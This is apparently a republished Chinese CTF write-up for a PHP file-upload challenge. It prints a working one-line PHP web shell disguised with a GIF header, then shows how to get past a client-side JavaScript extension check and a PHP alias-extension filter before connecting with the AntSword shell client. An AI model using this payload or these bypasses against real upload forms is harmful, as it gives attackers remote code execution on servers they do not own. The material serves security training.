這個題我有兩個思路。
1.繞過前端Js驗證,phtml拓展名的應用
首先打開之后,寫一個phtml文件
GIF89a <script language="php">eval($_POST['shell']);</script>
發現不允許上傳phtml文件
猜想有js驗證
F12查看
果然,將其刪除
蟻劍連接,
根目錄有flag.
2.php別名繞過
隨意上傳一個a.jpg,bp抓包,修改后綴名,改碼,添加代碼,放回
蟻劍鏈接,根目錄,flag
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。
猜您在找
BUUCTF-[ACTF2020 新生賽]Upload 1詳解
[ACTF2020 新生賽]Upload
[ACTF2020 新生賽]BackupFile && [ACTF2020 新生賽]Upload &&[GYCTF2020]Blacklist
BUUCTF-[ACTF2020 新生賽]Include 1
[BUUOJ記錄] [ACTF2020 新生賽]Upload
[ACTF2020 新生賽]Include
[ACTF2020 新生賽]Exec
[ACTF2020 新生賽]BackupFile
[ACTF2020 新生賽]Exec
BUUCTF--[ACTF新生賽2020]rome